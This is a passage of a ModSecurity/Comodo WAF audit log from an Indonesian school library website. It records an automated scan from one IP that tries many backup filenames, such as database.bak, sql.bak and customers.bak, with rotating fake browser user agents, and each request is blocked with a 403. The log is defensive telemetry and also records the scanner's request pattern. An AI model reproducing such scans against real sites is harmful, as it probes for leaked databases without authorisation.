"CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855089995 1698 (- - -) Stopwatch2: 1747543855089995 1698; combined=665, p1=338, p2=299, p3=0, p4=0, p5=28, sr=47, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dc00b86e-Z-- --c170da05-A-- [18/May/2025:11:50:55 +0700] aClnL_ypzAd0elWOk7o7rQAAAAo 103.236.140.4 53738 103.236.140.4 8181 --c170da05-B-- GET /error_log.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36 OPR/56.0.3051.99 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 122757001 --c170da05-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c170da05-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855097544 2001 (- - -) Stopwatch2: 1747543855097544 2001; combined=728, p1=365, p2=323, p3=0, p4=0, p5=40, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c170da05-Z-- --2058dc5f-A-- [18/May/2025:11:50:55 +0700] aClnL1ewLfDrCkDGIGxdFQAAAMM 103.236.140.4 54062 103.236.140.4 8181 --2058dc5f-B-- GET /bin.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.98 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 127580939 --2058dc5f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2058dc5f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855097220 3125 (- - -) Stopwatch2: 1747543855097220 3125; combined=624, p1=315, p2=284, p3=0, p4=0, p5=24, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2058dc5f-Z-- --0df77d08-A-- [18/May/2025:11:50:55 +0700] aClnL0PRqak7bVuUS6cR3wAAAI8 103.236.140.4 54810 103.236.140.4 8181 --0df77d08-B-- GET /wp.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.116 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 70778910 --0df77d08-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --0df77d08-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855097594 5848 (- - -) Stopwatch2: 1747543855097594 5848; combined=738, p1=367, p2=342, p3=0, p4=0, p5=29, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0df77d08-Z-- --f8bdb918-A-- [18/May/2025:11:50:55 +0700] aClnL0PRqak7bVuUS6cR5wAAAJg 103.236.140.4 55416 103.236.140.4 8181 --f8bdb918-B-- GET /database.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1; rv:62.0.3) Gecko/20100101 Firefox/62.0.3 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 83263503 --f8bdb918-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f8bdb918-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855104178 2285 (- - -) Stopwatch2: 1747543855104178 2285; combined=1086, p1=715, p2=341, p3=0, p4=0, p5=30, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f8bdb918-Z-- --7798050c-A-- [18/May/2025:11:50:55 +0700] aClnL0PRqak7bVuUS6cR4AAAAIU 103.236.140.4 54930 103.236.140.4 8181 --7798050c-B-- GET /tar.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:60.5.0) Gecko/20100101 Firefox/60.5.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 122395070 --7798050c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --7798050c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855101895 4918 (- - -) Stopwatch2: 1747543855101895 4918; combined=721, p1=332, p2=361, p3=0, p4=0, p5=27, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7798050c-Z-- --c8564a2d-A-- [18/May/2025:11:50:55 +0700] aClnL_ypzAd0elWOk7o7sgAAAAo 103.236.140.4 53706 103.236.140.4 8181 --c8564a2d-B-- GET /127.0.0.1.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 OPR/50.0.2762.58 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 86962048 --c8564a2d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c8564a2d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".0.0.1.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855099662 11465 (- - -) Stopwatch2: 1747543855099662 11465; combined=8815, p1=338, p2=8444, p3=0, p4=0, p5=32, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c8564a2d-Z-- --eab2a90d-A-- [18/May/2025:11:50:55 +0700] aClnL1ewLfDrCkDGIGxdGAAAANI 103.236.140.4 53760 103.236.140.4 8181 --eab2a90d-B-- GET /sql.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.9.0) Gecko/20100101 Firefox/52.9.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 127616644 --eab2a90d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --eab2a90d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855109459 2069 (- - -) Stopwatch2: 1747543855109459 2069; combined=739, p1=369, p2=333, p3=0, p4=0, p5=36, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eab2a90d-Z-- --25908c4c-A-- [18/May/2025:11:50:55 +0700] aClnL_ypzAd0elWOk7o7ywAAAA8 103.236.140.4 55588 103.236.140.4 8181 --25908c4c-B-- GET /sales.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.119 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151683078 --25908c4c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --25908c4c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855111506 1857 (- - -) Stopwatch2: 1747543855111506 1857; combined=669, p1=327, p2=316, p3=0, p4=0, p5=26, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --25908c4c-Z-- --77b25a23-A-- [18/May/2025:11:50:55 +0700] aClnL0PRqak7bVuUS6cR6gAAAJc 103.236.140.4 55576 103.236.140.4 8181 --77b25a23-B-- GET /erpustakaan.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36 OPR/55.0.2994.44 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 118849548 --77b25a23-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --77b25a23-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855110952 3234 (- - -) Stopwatch2: 1747543855110952 3234; combined=1000, p1=377, p2=589, p3=0, p4=0, p5=33, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --77b25a23-Z-- --a2c17678-A-- [18/May/2025:11:50:55 +0700] aClnL1ewLfDrCkDGIGxdGwAAAMA 103.236.140.4 54952 103.236.140.4 8181 --a2c17678-B-- GET /archive.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.5.2) Gecko/20100101 Firefox/52.5.2 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 118980620 --a2c17678-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a2c17678-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855098630 17113 (- - -) Stopwatch2: 1747543855098630 17113; combined=751, p1=365, p2=355, p3=0, p4=0, p5=31, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a2c17678-Z-- --eacd8910-A-- [18/May/2025:11:50:55 +0700] aClnL0PRqak7bVuUS6cR7wAAAJE 103.236.140.4 54316 103.236.140.4 8181 --eacd8910-B-- GET /localhost.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 150831113 --eacd8910-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --eacd8910-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855114105 2147 (- - -) Stopwatch2: 1747543855114105 2147; combined=777, p1=398, p2=348, p3=0, p4=0, p5=31, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eacd8910-Z-- --8b963e18-A-- [18/May/2025:11:50:55 +0700] aClnL_ypzAd0elWOk7o72gAAAAA 103.236.140.4 55624 103.236.140.4 8181 --8b963e18-B-- GET /erpustakaan.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 150634505 --8b963e18-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --8b963e18-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855115853 5527 (- - -) Stopwatch2: 1747543855115853 5527; combined=627, p1=300, p2=303, p3=0, p4=0, p5=24, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8b963e18-Z-- --6d64d706-A-- [18/May/2025:11:50:55 +0700] aClnL1ewLfDrCkDGIGxdJgAAANM 103.236.140.4 54058 103.236.140.4 8181 --6d64d706-B-- GET /bbs.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64; rv:60.5.0) Gecko/20100101 Firefox/60.5.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 150011910 --6d64d706-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --6d64d706-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855117550 4003 (- - -) Stopwatch2: 1747543855117550 4003; combined=698, p1=346, p2=323, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6d64d706-Z-- --bec3820d-A-- [18/May/2025:11:50:55 +0700] aClnL0PRqak7bVuUS6cR-wAAAJM 103.236.140.4 55514 103.236.140.4 8181 --bec3820d-B-- GET /my.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 75577343 --bec3820d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --bec3820d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855121721 2152 (- - -) Stopwatch2: 1747543855121721 2152; combined=788, p1=373, p2=383, p3=0, p4=0, p5=31, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bec3820d-Z-- --3177ad15-A-- [18/May/2025:11:50:55 +0700] aClnL0PRqak7bVuUS6cSAAAAAIQ 103.236.140.4 55654 103.236.140.4 8181 --3177ad15-B-- GET /customers.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 93032104 --3177ad15-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3177ad15-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855124331 2179 (- - -) Stopwatch2: 1747543855124331 2179; combined=756, p1=371, p2=356, p3=0, p4=0, p5=28, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3177ad15-Z-- --22d64923-A-- [18/May/2025:11:50:55 +0700] aClnL0PRqak7bVuUS6cR_wAAAJQ 103.236.140.4 54978 103.236.140.4 8181 --22d64923-B-- GET /erpustakaan_smkn22jakarta_sch_id.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151289865 --22d64923-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --22d64923-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855124203 5917 (- - -) Stopwatch2: 1747543855124203 5917; combined=1371, p1=349, p2=995, p3=0, p4=0, p5=26, sr=84, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --22d64923-Z-- --0fe9ee55-A-- [18/May/2025:11:50:55 +0700] aClnL1ewLfDrCkDGIGxdOgAAAME 103.236.140.4 54025 103.236.140.4 8181 --0fe9ee55-B-- GET /forum.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip 